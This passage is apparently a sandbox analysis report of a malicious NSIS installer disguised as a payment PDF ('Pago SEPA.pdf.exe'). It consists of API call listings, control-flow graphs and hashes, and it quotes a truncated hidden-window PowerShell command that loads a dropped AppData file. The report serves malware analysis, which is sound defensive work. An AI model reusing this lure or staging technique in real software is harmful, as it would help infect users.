                                                                      • GetDlgItem.USER32(?,?), ref: 00403CB5
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC9
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CD0
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403D7E
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D88
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403DA2
                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DF3
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E99
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EBA
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECC
                                                                      • EnableWindow.USER32(?,?), ref: 00403EE7
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFD
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403F04
                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F1C
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2F
                                                                      • lstrlenW.KERNEL32(00422708,?,00422708,00428220), ref: 00403F58
                                                                      • SetWindowTextW.USER32(?,00422708), ref: 00403F6C
                                                                      • ShowWindow.USER32(?,0000000A), ref: 004040A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3282139019-0
                                                                      • Opcode ID: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                      • Instruction ID: 61cac7681639d4f9e887145b94be1570fe16d39d0a036e069046cfcd2a92ab20
                                                                      • Opcode Fuzzy Hash: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                      • Instruction Fuzzy Hash: 3BC1C071A04200BBDB316F61ED84E2B3AACEB95705F50053EF601B11F1CB799992DB6E
                                                                      Function 00403868 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 287 403868-403880 call 4063f5 290 403882-403892 call 405f66 287->290 291 403894-4038cb call 405eec 287->291 298 4038ee-403917 call 403b3e call 405adb 290->298 296 4038e3-4038e9 lstrcatW 291->296 297 4038cd-4038de call 405eec 291->297 296->298 297->296 305 4039a9-4039b1 call 405adb 298->305 306 40391d-403922 298->306 312 4039b3-4039ba call 406041 305->312 313 4039bf-4039e4 LoadImageW 305->313 306->305 307 403928-403950 call 405eec 306->307 307->305 314 403952-403956 307->314 312->313 316 403a65-403a6d call 40140b 313->316 317 4039e6-403a16 RegisterClassW 313->317 319 403968-403974 lstrlenW 314->319 320 403958-403965 call 405a00 314->320 329 403a77-403a82 call 403b3e 316->329 330 403a6f-403a72 316->330 321 403b34 317->321 322 403a1c-403a60 SystemParametersInfoW CreateWindowExW 317->322 326 403976-403984 lstrcmpiW 319->326 327 40399c-4039a4 call 4059d3 call 40601f 319->327 320->319 325 403b36-403b3d 321->325 322->316 326->327 328 403986-403990 GetFileAttributesW 326->328 327->305 333 403992-403994 328->333 334 403996-403997 call 405a1f 328->334 340 403a88-403aa2 ShowWindow call 406389 329->340 341 403b0b-403b0c call 405251 329->341 330->325 333->327 333->334 334->327 348 403aa4-403aa9 call 406389 340->348 349 403aae-403ac0 GetClassInfoW 340->349 344 403b11-403b13 341->344 346 403b15-403b1b 344->346 347 403b2d-403b2f call 40140b 344->347 346->330 350 403b21-403b28 call 40140b 346->350 347->321 348->349 353 403ac2-403ad2 GetClassInfoW RegisterClassW 349->353 354 403ad8-403afb DialogBoxParamW call 40140b 349->354 350->330 353->354 357 403b00-403b09 call 4037b8 354->357 357->325
                                                                      APIs
                                                                        • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                        • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422
                                                                      • lstrcatW.KERNEL32(1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004038E9
                                                                      • lstrlenW.KERNEL32(004271C0,?,?,?,004271C0,00000000,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,75923420), ref: 00403969
                                                                      • lstrcmpiW.KERNEL32(004271B8,.exe,004271C0,?,?,?,004271C0,00000000,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000), ref: 0040397C
                                                                      • GetFileAttributesW.KERNEL32(004271C0), ref: 00403987
                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers), ref: 004039D0
                                                                        • Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73
                                                                      • RegisterClassW.USER32(004281C0), ref: 00403A0D
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A25
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A5A
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A90
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281C0), ref: 00403ABC
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281C0), ref: 00403AC9
                                                                      • RegisterClassW.USER32(004281C0), ref: 00403AD2
                                                                      • DialogBoxParamW.USER32(?,00000000,00403C0B,00000000), ref: 00403AF1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: Completed$"C:\Users\user\Desktop\Pago SEPA.pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 1975747703-1217110142
                                                                      • Opcode ID: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                      • Instruction ID: 2be98759588b12f3ea5babf1b6ec1a1322f2c31473ef1d4f92accd895ea03b39
                                                                      • Opcode Fuzzy Hash: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                      • Instruction Fuzzy Hash: C861A670644200BAD220AF669D45F3B3A6CEB84749F80457FF941B22E2CB7C6D01CA7E
                                                                      Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405bf4 364 402e48-402e76 call 40601f call 405a1f call 40601f GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 381 402f73-402f76 373->381 382 402fc6-402fcb 373->382 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 40320c 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403222 call 40320c 381->384 385 402f9a-402fc4 GlobalAlloc call 403222 call 403027 381->385 382->366 384->382 407 402f92-402f98 384->407 385->382 412 402fd7-402fe8 385->412 391 402eb4-402ec8 call 405baf 386->391 392 402f2e-402f32 386->392 387->382 397 402f3c-402f42 391->397 410 402eca-402ed1 391->410 396 402f34-402f3b call 402d8a 392->396 392->397 396->397 403 402f51-402f5b 397->403 404 402f44-402f4e call 4064a6 397->404 403->376 411 402f61 403->411 404->403 407->382 407->385 410->397 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->397 418 402edc-402ee3 414->418 417 402ff6-402ffc 415->417 416->415 417->417 419 402ffe-403019 SetFilePointer call 405baf 417->419 418->397 420 402ee5-402eec 418->420 423 40301e 419->423 420->397 422 402eee-402f0e 420->422 422->382 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->397 427 402f2a-402f2c 425->427 426->411 426->425 427->397
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Pago SEPA.pdf.exe,00000400,?,?,00000000,00403504,?), ref: 00402E1B
                                                                        • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                        • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Pago SEPA.pdf.exe,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00402E67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Pago SEPA.pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                      • API String ID: 4283519449-3959948815
                                                                      • Opcode ID: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
                                                                      • Instruction ID: cad0cac5a7d3da6b721da94722abfb33afad8597fd9771d3107dd1117b6c1d4f
                                                                      • Opcode Fuzzy Hash: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
                                                                      • Instruction Fuzzy Hash: EA51D471901216ABDB209F64DE89B9E7BB8EB04354F20407BF904F62D1C7BC9D419BAD
                                                                      Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 554 401767-40178c call 402bbf call 405a4a 559 401796-4017a8 call 40601f call 4059d3 lstrcatW 554->559 560 40178e-401794 call 40601f 554->560 565 4017ad-4017ae call 4062b3 559->565 560->565 569 4017b3-4017b7 565->569 570 4017b9-4017c3 call 406362 569->570 571 4017ea-4017ed 569->571 578 4017d5-4017e7 570->578 579 4017c5-4017d3 CompareFileTime 570->579 573 4017f5-401811 call 405bf4 571->573 574 4017ef-4017f0 call 405bcf 571->574 581 401813-401816 573->581 582 401885-4018ae call 40517e call 403027 573->582 574->573 578->571 579->578 584 401867-401871 call 40517e 581->584 585 401818-401856 call 40601f * 2 call 406041 call 40601f call 405764 581->585 596 4018b0-4018b4 582->596 597 4018b6-4018c2 SetFileTime 582->597 594 40187a-401880 584->594 585->569 617 40185c-40185d 585->617 598 402a55 594->598 596->597 600 4018c8-4018d3 CloseHandle 596->600 597->600 601 402a57-402a5b 598->601 603 4018d9-4018dc 600->603 604 402a4c-402a4f 600->604 606 4018f1-4018f4 call 406041 603->606 607 4018de-4018ef call 406041 lstrcatW 603->607 604->598 613 4018f9-40228d call 405764 606->613 607->613 613->601 613->604 617->594 619 40185f-401860 617->619 619->584
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,?,?,00000031), ref: 004017A8
                                                                      • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,00000000,00000000,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,?,?,00000031), ref: 004017CD
                                                                        • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                        • Part of subcall function 0040517E: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                        • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                        • Part of subcall function 0040517E: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00403160,00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000), ref: 004051D9
                                                                        • Part of subcall function 0040517E: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\), ref: 004051EB
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$C:\Users\user\AppData\Roaming\Egetrets105.met
                                                                      • API String ID: 1941528284-3704653189
                                                                      • Opcode ID: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
                                                                      • Instruction ID: e39dfb19bb2720adffc224853af95c022162de9bd11196ce21bc9617d3384428
                                                                      • Opcode Fuzzy Hash: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
                                                                      • Instruction Fuzzy Hash: 9041D571900515BACF20BFB5CC45DAF3679EF45328B20427BF422B50E2DB3C8A519A6D
                                                                      Function 0040517E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 620 40517e-405193 621 405199-4051aa 620->621 622 40524a-40524e 620->622 623 4051b5-4051c1 lstrlenW 621->623 624 4051ac-4051b0 call 406041 621->624 626 4051c3-4051d3 lstrlenW 623->626 627 4051de-4051e2 623->627 624->623 626->622 628 4051d5-4051d9 lstrcatW 626->628 629 4051f1-4051f5 627->629 630 4051e4-4051eb SetWindowTextW 627->630 628->627 631 4051f7-405239 SendMessageW * 3 629->631 632 40523b-40523d 629->632 630->629 631->632 632->622 633 40523f-405242 632->633 633->622
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                      • lstrlenW.KERNEL32(00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00403160,00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000), ref: 004051D9
                                                                      • SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\), ref: 004051EB
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\
                                                                      • API String ID: 2531174081-2318496318
                                                                      • Opcode ID: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                      • Instruction ID: 21bddbe199db3e121897d5596c22f00b0e76f5ccd37bc28327e30b1938552548
                                                                      • Opcode Fuzzy Hash: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                      • Instruction Fuzzy Hash: 9E219D71900118BACB219FA5DD84ACFBFB9EF58350F14807AF904B62A0C7798A41CF68
                                                                      Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 634 403027-40303e 635 403040 634->635 636 403047-40304f 634->636 635->636 637 403051 636->637 638 403056-40305b 636->638 637->638 639 40306b-403078 call 40320c 638->639 640 40305d-403066 call 403222 638->640 644 4031c3 639->644 645 40307e-403082 639->645 640->639 646 4031c5-4031c6 644->646 647 403088-4030a8 GetTickCount call 406514 645->647 648 4031ac-4031ae 645->648 650 403205-403209 646->650 658 403202 647->658 660 4030ae-4030b6 647->660 651 4031b0-4031b3 648->651 652 4031f7-4031fb 648->652 653 4031b5 651->653 654 4031b8-4031c1 call 40320c 651->654 655 4031c8-4031ce 652->655 656 4031fd 652->656 653->654 654->644 667 4031ff 654->667 661 4031d0 655->661 662 4031d3-4031e1 call 40320c 655->662 656->658 658->650 664 4030b8 660->664 665 4030bb-4030c9 call 40320c 660->665 661->662 662->644 671 4031e3-4031ef call 405ca6 662->671 664->665 665->644 672 4030cf-4030d8 665->672 667->658 677 4031f1-4031f4 671->677 678 4031a8-4031aa 671->678 674 4030de-4030fb call 406534 672->674 680 403101-403118 GetTickCount 674->680 681 4031a4-4031a6 674->681 677->652 678->646 682 403163-403165 680->682 683 40311a-403122 680->683 681->646 684 403167-40316b 682->684 685 403198-40319c 682->685 686 403124-403128 683->686 687 40312a-40315b MulDiv wsprintfW call 40517e 683->687 688 403180-403186 684->688 689 40316d-403172 call 405ca6 684->689 685->660 690 4031a2 685->690 686->682 686->687 692 403160 687->692 694 40318c-403190 688->694 695 403177-403179 689->695 690->658 692->682 694->674 696 403196 694->696 695->678 697 40317b-40317e 695->697 696->658 697->694
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134
                                                                      • Opcode ID: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
                                                                      • Instruction ID: dc339ecebd5a12fc0f5e273b782e0acc65c92b35cb5ec2ffb99f959b3dc2fe49
